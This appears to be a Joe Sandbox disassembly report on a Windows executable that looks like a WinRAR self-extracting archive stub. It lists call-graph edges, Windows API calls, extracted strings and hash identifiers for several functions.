21040->21042 21056 7ff70ece650a 21040->21056 21041 7ff70ecf5c30 _handle_error 8 API calls 21044 7ff70ece697b 21041->21044 21043 7ff70ece511c 120 API calls 21042->21043 21047 7ff70ece63f8 21042->21047 21042->21056 21043->21042 21044->20945 21045 7ff70ece64a2 21077 7ff70ece569c 21045->21077 21047->21045 21048 7ff70ece511c 120 API calls 21047->21048 21047->21056 21048->21047 21049 7ff70ece674c 21050 7ff70ece569c 8 API calls 21049->21050 21051 7ff70ece67c0 21050->21051 21054 7ff70ece569c 8 API calls 21051->21054 21051->21056 21052 7ff70ece6500 21052->21049 21053 7ff70ece511c 120 API calls 21052->21053 
21052->21056 21053->21052 21055 7ff70ece6896 21054->21055 21055->21056 21081 7ff70ece5e44 21055->21081 21056->21041 21061 7ff70ece6ba8 21058->21061 21059 7ff70ece6bdf 21062 7ff70ece511c 120 API calls 21059->21062 21063 7ff70ece6bee 21059->21063 21065 7ff70ece6c2d 21059->21065 21060 7ff70ece511c 120 API calls 21060->21061 21061->21059 21061->21060 21062->21059 21063->20945 21064 7ff70ece511c 120 API calls 21064->21065 21065->21063 21065->21064 21066 7ff70ece4d74 104 API calls 21065->21066 21066->21065 21068 7ff70ecd4d89 21067->21068 21069 7ff70ecd4d6d 21067->21069 21070 7ff70ecd4d9b 21068->21070 21072 7ff70ecd4da1 SetFilePointer 21068->21072 21069->21070 21086 7ff70ecd3eac 99 API calls std::_Xinvalid_argument 21069->21086 21070->20945 21072->21070 21073 7ff70ecd4dbe GetLastError 21072->21073 21073->21070 21074 7ff70ecd4dc8 21073->21074 21074->21070 21087 7ff70ecd3eac 99 API calls std::_Xinvalid_argument 21074->21087 21076->20945 21080 7ff70ece56fe memcpy_s 21077->21080 21078 7ff70ecf5c30 _handle_error 8 API calls 21079 7ff70ece5ae9 21078->21079 21079->21052 21080->21078 21084 7ff70ece5ea7 21081->21084 21082 7ff70ece6260 21082->21056 21083 7ff70ece511c 120 API calls 21083->21084 21084->21082 21084->21083 21085 7ff70ece4d74 104 API calls 21084->21085 21085->21084 21089 7ff70ecd4c94 21088->21089 21092 7ff70ecd4ca4 21088->21092 21090 7ff70ecd4c9a FlushFileBuffers 21089->21090 21089->21092 21090->21092 21091 7ff70ecd4d0e SetFileTime 21091->20960 21092->21091 21094 7ff70ecd4302 21093->21094 21095 7ff70ecd42ea 21093->21095 21096 7ff70ecd4326 21094->21096 21113 7ff70ecd3a64 99 API calls 21094->21113 21095->21094 21097 7ff70ecd42f6 CloseHandle 21095->21097 21096->20958 21097->21094 21100 7ff70ecd601b 21099->21100 21101 7ff70ecd601e SetFileAttributesW 21099->21101 21100->21101 21102 7ff70ecd6034 21101->21102 21103 7ff70ecd60b5 21101->21103 21105 7ff70ecd80b0 49 API calls 21102->21105 21104 7ff70ecf5c30 _handle_error 8 API calls 21103->21104 21107 7ff70ecd60ca 21104->21107 
21106 7ff70ecd6059 21105->21106 21108 7ff70ecd607c 21106->21108 21109 7ff70ecd605d SetFileAttributesW 21106->21109 21107->20959 21108->21103 21110 7ff70ecd60da 21108->21110 21109->21108 21111 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21110->21111 21112 7ff70ecd60df 21111->21112 21113->21096 21116 7ff70ecd5c8f 21114->21116 21115 7ff70ecd5cbc 21134 7ff70ecd5890 21115->21134 21116->21115 21117 7ff70ecd5ca8 CreateDirectoryW 21116->21117 21117->21115 21119 7ff70ecd5d59 21117->21119 21121 7ff70ecd5d69 21119->21121 21123 7ff70ecd5ff4 51 API calls 21119->21123 21125 7ff70ecf5c30 _handle_error 8 API calls 21121->21125 21122 7ff70ecd5d6d GetLastError 21122->21121 21123->21121 21124 7ff70ecd80b0 49 API calls 21126 7ff70ecd5cf8 21124->21126 21127 7ff70ecd5d95 21125->21127 21128 7ff70ecd5cfc CreateDirectoryW 21126->21128 21129 7ff70ecd5d17 21126->21129 21127->20971 21128->21129 21130 7ff70ecd5d50 21129->21130 21131 7ff70ecd5daa 21129->21131 21130->21119 21130->21122 21132 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21131->21132 21133 7ff70ecd5daf 21132->21133 21135 7ff70ecd58bb GetFileAttributesW 21134->21135 21136 7ff70ecd58b8 21134->21136 21137 7ff70ecd58cc 21135->21137 21138 7ff70ecd5949 21135->21138 21136->21135 21139 7ff70ecd80b0 49 API calls 21137->21139 21140 7ff70ecf5c30 _handle_error 8 API calls 21138->21140 21141 7ff70ecd58f3 21139->21141 21142 7ff70ecd595d 21140->21142 21143 7ff70ecd5910 21141->21143 21144 7ff70ecd58f7 GetFileAttributesW 21141->21144 21142->21122 21142->21124 21143->21138 21145 7ff70ecd596d 21143->21145 21144->21143 21146 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21145->21146 21147 7ff70ecd5972 21146->21147 21178 7ff70ecd4a70 21148->21178 21149 7ff70ecf5c30 _handle_error 8 API calls 21150 7ff70ece5176 21149->21150 21150->20995 21150->20997 21150->20998 21152 7ff70ecd6288 55 API calls 21153 7ff70ece5483 21152->21153 21154 7ff70ece5501 21153->21154 21155 7ff70ece54ab 21153->21155 21156 7ff70ece54ff 
21154->21156 21230 7ff70ece1dd0 21154->21230 21155->21156 21183 7ff70ece1bf4 21155->21183 21241 7ff70ece4e68 21156->21241 21160 7ff70ece54bc 21161 7ff70ecd12bc 33 API calls 21160->21161 21163 7ff70ece54f3 21161->21163 21162 7ff70ece553b 21165 7ff70ecd12bc 33 API calls 21162->21165 21173 7ff70ece558f 21162->21173 21214 7ff70ecd8d18 21163->21214 21164 7ff70ece568f 21167 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21164->21167 21168 7ff70ece557b 21165->21168 21169 7ff70ece5694 21167->21169 21248 7ff70ece0114 21168->21248 21171 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21169->21171 21172 7ff70ece569a 21171->21172 21173->21164 21173->21169 21174 7ff70ece5621 21173->21174 21174->21149 21177->20998 21179 7ff70ecd4a96 21178->21179 21180 7ff70ecd4a9d 21178->21180 21179->21152 21179->21174 21180->21179 21181 7ff70ecd4520 GetStdHandle ReadFile GetLastError GetLastError GetFileType 21180->21181 21264 7ff70ecd3d8c 99 API calls std::_Xinvalid_argument 21180->21264 21181->21180 21265 7ff70ecd7af8 47 API calls 21183->21265 21185 7ff70ece1c2e 21186 7ff70ecd12bc 33 API calls 21185->21186 21187 7ff70ece1c5a 21186->21187 21266 7ff70ece0aa0 CompareStringW 21187->21266 21189 7ff70ece1c82 21190 7ff70ecd12bc 33 API calls 21189->21190 21195 7ff70ece1cdc 21189->21195 21192 7ff70ece1cb1 21190->21192 21191 7ff70ecd1b70 31 API calls 21193 7ff70ece1d9a 21191->21193 21267 7ff70ece0ad0 CompareStringW 21192->21267 21198 7ff70ecf5c30 _handle_error 8 API calls 21193->21198 21194 7ff70ece1dc7 21199 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21194->21199 21195->21194 21196 7ff70ece1d7b 21195->21196 21200 7ff70ece1dc2 21195->21200 21196->21191 21201 7ff70ece1da9 21198->21201 21203 7ff70ece1dcd 21199->21203 21202 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21200->21202 21201->21160 21202->21194 21204 7ff70ece1bf4 64 API calls 21203->21204 21205 7ff70ece1df9 21204->21205 21268 7ff70ecd61e8 21205->21268 21207 7ff70ece1e2a 21208 
7ff70ecd12bc 33 API calls 21207->21208 21209 7ff70ece1e55 21208->21209 21210 7ff70ecd8d18 47 API calls 21209->21210 21211 7ff70ece1e62 21210->21211 21212 7ff70ecf5c30 _handle_error 8 API calls 21211->21212 21213 7ff70ece1e72 21212->21213 21213->21160 21215 7ff70ecd8d41 21214->21215 21216 7ff70ecd8d4d 21215->21216 21218 7ff70ecd8dbe 21215->21218 21272 7ff70ecd6e5c 21216->21272 21280 7ff70ecd353c 47 API calls 21218->21280 21222 7ff70ecd1c04 33 API calls 21223 7ff70ecd8d92 21222->21223 21224 7ff70ecd1b70 31 API calls 21223->21224 21225 7ff70ecd8d9d 21224->21225 21226 7ff70ecd1b70 31 API calls 21225->21226 21227 7ff70ecd8da6 21226->21227 21228 7ff70ecf5c30 _handle_error 8 API calls 21227->21228 21229 7ff70ecd8db3 21228->21229 21229->21156 21231 7ff70ece1bf4 64 API calls 21230->21231 21232 7ff70ece1df9 21231->21232 21233 7ff70ecd61e8 swprintf 46 API calls 21232->21233 21234 7ff70ece1e2a 21233->21234 21235 7ff70ecd12bc 33 API calls 21234->21235 21236 7ff70ece1e55 21235->21236 21237 7ff70ecd8d18 47 API calls 21236->21237 21238 7ff70ece1e62 21237->21238 21239 7ff70ecf5c30 _handle_error 8 API calls 21238->21239 21240 7ff70ece1e72 21239->21240 21240->21156 21242 7ff70ecf5ae0 4 API calls 21241->21242 21243 7ff70ece4e76 21242->21243 21282 7ff70ecd46a0 21243->21282 21245 7ff70ece4ed4 21245->21162 21249 7ff70ecf3bf8 21248->21249 21301 7ff70ecd8b28 21249->21301 21252 7ff70ecdaee0 48 API calls 21253 7ff70ecf3c3f 21252->21253 21254 7ff70ecdda04 48 API calls 21253->21254 21255 7ff70ecf3c4f 21254->21255 21256 7ff70ecd1b70 31 API calls 21255->21256 21257 7ff70ecf3c5a 21256->21257 21309 7ff70ecf376c 21257->21309 21260 7ff70ecd1b70 31 API calls 21261 7ff70ecf3c7b 21260->21261 21262 7ff70ecf5c30 _handle_error 8 API calls 21261->21262 21263 7ff70ecf3c88 21262->21263 21263->21173 21265->21185 21266->21189 21267->21195 21269 7ff70ecd620d _snwprintf 21268->21269 21270 7ff70ecfd348 swprintf 46 API calls 21269->21270 21271 7ff70ecd6229 21270->21271 21271->21207 21273 7ff70ecd6e7c 21272->21273 
21274 7ff70ecd6e95 21273->21274 21275 7ff70ecd6ed6 21273->21275 21278 7ff70ecd7050 4 API calls 21274->21278 21281 7ff70ecd1bd4 33 API calls std::_Xinvalid_argument 21275->21281 21279 7ff70ecd6ec3 21278->21279 21279->21222 21283 7ff70ecd46dd CreateFileW 21282->21283 21285 7ff70ecd478e GetLastError 21283->21285 21294 7ff70ecd484e 21283->21294 21286 7ff70ecd80b0 49 API calls 21285->21286 21287 7ff70ecd47bc 21286->21287 21288 7ff70ecd47c0 CreateFileW GetLastError 21287->21288 21293 7ff70ecd480c 21287->21293 21288->21293 21289 7ff70ecd48e8 21291 7ff70ecf5c30 _handle_error 8 API calls 21289->21291 21290 7ff70ecd4891 SetFileTime 21292 7ff70ecd48af 21290->21292 21295 7ff70ecd48fb 21291->21295 21292->21289 21296 7ff70ecd1c80 33 API calls 21292->21296 21293->21294 21297 7ff70ecd4916 21293->21297 21294->21290 21294->21292 21295->21245 21300 7ff70ecd3cd0 100 API calls 2 library calls 21295->21300 21296->21289 21298 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21297->21298 21299 7ff70ecd491b 21298->21299 21300->21245 21302 7ff70ecd8b40 21301->21302 21303 7ff70ecd8b57 21302->21303 21304 7ff70ecd8b89 21302->21304 21306 7ff70ecd12bc 33 API calls 21303->21306 21321 7ff70ecd353c 47 API calls 21304->21321 21308 7ff70ecd8b7b 21306->21308 21308->21252 21310 7ff70ecf3798 21309->21310 21311 7ff70ecd12bc 33 API calls 21310->21311 21312 7ff70ecf37a8 21311->21312 21322 7ff70ecf2bf4 21312->21322 21315 7ff70ecf37ef 21316 7ff70ecf5c30 _handle_error 8 API calls 21315->21316 21318 7ff70ecf3801 21316->21318 21317 7ff70ecf3807 21319 7ff70ecfae94 _invalid_parameter_noinfo_noreturn 31 API calls 21317->21319 21318->21260 21320 7ff70ecf380c 21319->21320 21336 7ff70ecee96c PeekMessageW 21322->21336 21325 7ff70ecf2c45 21329 7ff70ecf2c51 ShowWindow SendMessageW SendMessageW 21325->21329 21326 7ff70ecf2c93 SendMessageW SendMessageW 21327 7ff70ecf2cf4 SendMessageW 21326->21327 21328 7ff70ecf2cd9 21326->21328 21330 7ff70ecf2d16 SendMessageW SendMessageW 21327->21330 21331 7ff70ecf2d13 
21327->21331 21328->21327 21329->21326 21332 7ff70ecf2d43 SendMessageW 21330->21332 21333 7ff70ecf2d68 SendMessageW 21330->21333 21331->21330 21332->21333 21334 7ff70ecf5c30 _handle_error 8 API calls 21333->21334 21335 7ff70ecf2d8c 21334->21335 21335->21315 21335->21317 21337 7ff70ecee9d0 GetDlgItem 21336->21337 21338 7ff70ecee98c GetMessageW 21336->21338 21337->21325 21337->21326 21339 7ff70ecee9ab IsDialogMessageW 21338->21339 21340 7ff70ecee9ba TranslateMessage DispatchMessageW 21338->21340 21339->21337 21339->21340 21340->21337 21342 7ff70ecd4e4b 21341->21342 21356 7ff70ecd4e44 21341->21356 21343 7ff70ecd4e55 GetStdHandle 21342->21343 21349 7ff70ecd4e63 21342->21349 21343->21349 21344 7ff70ecf5c30 _handle_error 8 API calls 21345 7ff70ecd4fee 21344->21345 21345->21004 21346 7ff70ecd4ebe WriteFile 21346->21349 21347 7ff70ecd4e7e WriteFile 21348 7ff70ecd4eb4 21347->21348 21347->21349 21348->21347 21348->21349 21349->21346 21349->21347 21351 7ff70ecd4f56 21349->21351 21349->21356 21360 7ff70ecd3a18 101 API calls 21349->21360 21352 7ff70ecd12bc 33 API calls 21351->21352 21353 7ff70ecd4f85 21352->21353 21361 7ff70ecd4190 99 API calls std::_Xinvalid_argument 21353->21361 21356->21344 21360->21349 22362 7ff70ed00e5c 22363 7ff70ed00ea7 22362->22363 22368 7ff70ed00e6b abort 22362->22368 22370 7ff70ed00bac 15 API calls abort 22363->22370 22364 7ff70ed00e8e HeapAlloc 22366 7ff70ed00ea5 22364->22366 22364->22368 22368->22363 22368->22364 22369 7ff70ecff0c8 EnterCriticalSection LeaveCriticalSection abort 22368->22369 22369->22368 22370->22366 20599 7ff70ecf4f32 20602 7ff70ecf5390 20599->20602 20628 7ff70ecf4fe8 20602->20628 20605 7ff70ecf541b 20606 7ff70ecf52f8 DloadReleaseSectionWriteAccess 6 API calls 20605->20606 20607 7ff70ecf5428 RaiseException 20606->20607 20608 7ff70ecf4f71 20607->20608 20609 7ff70ecf54cd LoadLibraryExA 20612 7ff70ecf54e4 GetLastError 20609->20612 20613 7ff70ecf5539 20609->20613 20610 7ff70ecf5444 20610->20609 20611 7ff70ecf5615 20610->20611 
20610->20613 20615 7ff70ecf554d 20610->20615 20636 7ff70ecf52f8 20611->20636 20617 7ff70ecf550e 20612->20617 20618 7ff70ecf54f9 20612->20618 20614 7ff70ecf5544 FreeLibrary 20613->20614 20613->20615 20614->20615 20615->20611 20616 7ff70ecf55ab GetProcAddress 20615->20616 20616->20611 20619 7ff70ecf55c0 GetLastError 20616->20619 20621 7ff70ecf52f8 DloadReleaseSectionWriteAccess 6 API calls 20617->20621 20618->20613 20618->20617 20623 7ff70ecf55d5 20619->20623 20622 7ff70ecf551b RaiseException 20621->20622 20622->20608 20623->20611 20624 7ff70ecf52f8 DloadReleaseSectionWriteAccess 6 API calls 20623->20624 20625 7ff70ecf55f7 RaiseException 20624->20625 20626 7ff70ecf4fe8 DloadAcquireSectionWriteAccess 6 API calls 20625->20626 20627 7ff70ecf5611 20626->20627 20627->20611 20629 7ff70ecf4ffe 20628->20629 20635 7ff70ecf5063 20628->20635 20644 7ff70ecf5094 20629->20644 20632 7ff70ecf505e 20634 7ff70ecf5094 DloadReleaseSectionWriteAccess 3 API calls 20632->20634 20634->20635 20635->20605 20635->20610 20637 7ff70ecf5308 20636->20637 20643 7ff70ecf5361 20636->20643 20638 7ff70ecf5094 DloadReleaseSectionWriteAccess 3 API calls 20637->20638 20639 7ff70ecf530d 20638->20639 20640 7ff70ecf535c 20639->20640 20641 7ff70ecf5268 DloadProtectSection 3 API calls 20639->20641 20642 7ff70ecf5094 DloadReleaseSectionWriteAccess 3 API calls 20640->20642 20641->20640 20642->20643 20643->20608 20645 7ff70ecf5003 20644->20645 20646 7ff70ecf50af 20644->20646 20645->20632 20651 7ff70ecf5268 20645->20651 20646->20645 20647 7ff70ecf50b4 GetModuleHandleW 20646->20647 20648 7ff70ecf50ce GetProcAddress 20647->20648 20649 7ff70ecf50c9 20647->20649 20648->20649 20650 7ff70ecf50e3 GetProcAddress 20648->20650 20649->20645 20650->20649 20653 7ff70ecf528a DloadProtectSection 20651->20653 20652 7ff70ecf5292 20652->20632 20653->20652 20654 7ff70ecf52ca VirtualProtect 20653->20654 20656 7ff70ecf5134 VirtualQuery GetSystemInfo 20653->20656 20654->20652 20656->20654 20711 7ff70ecf4f2d 20713 7ff70ecf4e65 

                                                                                                                                                                          Control-flow Graph
                                                                                                                                                                          • Interactive graph of the function at 7ff70ecddc4c (entry block calls 7ff70ecd13c4 and GetSystemDirectoryW); legend: Executed / Not Executed
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$AddressProc$DirectoryHandleLibraryLoadModuleSystem
                                                                                                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                                          • API String ID: 751436351-2013832382
                                                                                                                                                                          • Opcode ID: 5ec89f6802affc2948b8ee13fc3eda9d2508545244b2c8bba0ddb447261d35e8
                                                                                                                                                                          • Instruction ID: 9b323a32f199ec976349c83822a011bfc4d48e3138b852d255c13912d3ef2259
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ec89f6802affc2948b8ee13fc3eda9d2508545244b2c8bba0ddb447261d35e8
                                                                                                                                                                          • Instruction Fuzzy Hash: E8623D32A1DB82A9EB11AB64EC402EEB364FF44354F944236DA4D477A5EF3ED244C360
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWait
                                                                                                                                                                          • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                                                                                                          • API String ID: 2514108016-2702805183
                                                                                                                                                                          • Opcode ID: 656f4d71f1355d92385f88fb14d0a5aa5a8e80a74f0fc3a42f07c745783969ed
                                                                                                                                                                          • Instruction ID: 549c47aa3b431029c806d6c4cd3e9bd271a15d816c8174cea885738a1437412c
                                                                                                                                                                          • Opcode Fuzzy Hash: 656f4d71f1355d92385f88fb14d0a5aa5a8e80a74f0fc3a42f07c745783969ed
                                                                                                                                                                          • Instruction Fuzzy Hash: 24D29162B0D782A5EA20BB25EC542FAE361EF85784FC04136D98D477A6DF3EE544C720
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$MessageMoveSend$DialogItemOperationPathTemp
                                                                                                                                                                          • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                                                                                                          • API String ID: 2933078328-3916287355
                                                                                                                                                                          • Opcode ID: 55dfa35ca51e5714cd7530dcbfea3c77453af1272171f684410000b67e8c5d25
                                                                                                                                                                          • Instruction ID: bb94bd1296644117aa06638196ea7da0a5f2a9f3c810139d59475db85e10e52f
                                                                                                                                                                          • Opcode Fuzzy Hash: 55dfa35ca51e5714cd7530dcbfea3c77453af1272171f684410000b67e8c5d25
                                                                                                                                                                          • Instruction Fuzzy Hash: A713D372B08782A9EB10EF64DC502EE67B1EF40798F941136DA4D17AEADF39D584C360

Control-flow Graph (graph rendering not reproduced here)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: File$EnvironmentHandleVariableView_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
• String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
• API String ID: 3767324925-3710569615
• Opcode ID: a58a6387ee17bb6639eb3cae4dff6e3da3947667857c240d721c3ea59f8806c2
• Instruction ID: b038bbad2ca370c2fd33099b68ca45234cac89e74342193d9097bcaefc816071
• Opcode Fuzzy Hash: a58a6387ee17bb6639eb3cae4dff6e3da3947667857c240d721c3ea59f8806c2
• Instruction Fuzzy Hash: E642A372B19B82A1EB14EF24EC542BEA365FF84B84F844236DA9D47A95DF3DD540C320

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
• String ID: $%s:$CAPTION
• API String ID: 2100155373-404845831
• Opcode ID: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
• Instruction ID: ab76762f9df008b1a6fb46394a885ff2a6e3d033f0a24af16706d38a02b22ada
• Opcode Fuzzy Hash: 37b82379b4c8609f857ddfdd2aaec8a8c1c03398c79129c67daa6eff71331f07
• Instruction Fuzzy Hash: 0F91C536B1864596E714EF39AD006AAE7A1FBC4784F845135EE4D47B98CF3EE805CB10

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
• String ID: PNG
• API String ID: 3656887471-364855578
• Opcode ID: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
• Instruction ID: c06e510363a6f5b80377cf02113ffb1a56fdffb174c30ab379f53d14127196fe
• Opcode Fuzzy Hash: 52838de665b1cfca97a252f31006ab2ca50257577933ff1d2f2095c083ed68dc
• Instruction Fuzzy Hash: 68416221B0974691EB14EB16DC5477AF3A0EF48B94F884435CE0D873A4EF7DE4449720

Control-flow Graph (graph rendering not reproduced here)
APIs
Memory Dump Source
• Source File: 00000000.00000002.1894018569.00007FF70ECD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70ECD0000, based on PE: true
• Associated: 00000000.00000002.1893972390.00007FF70ECD0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895106506.00007FF70ED0B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED1D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1895340218.00007FF70ED26000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1897838073.00007FF70ED3C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70ecd0000_HLZwUhcJ28.jbxd
Similarity
• API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
• String ID:
• API String ID: 474548282-0
• Opcode ID: 0b8333a0f29a327c36cbe3270ce1716225374cdc2a996147068cd886246ff935
• Instruction ID: 0913a497b7e5f1a6ba6eb716b1ff0fd022ada47b71a97babb7cc0278526140d8
• Opcode Fuzzy Hash: 0b8333a0f29a327c36cbe3270ce1716225374cdc2a996147068cd886246ff935
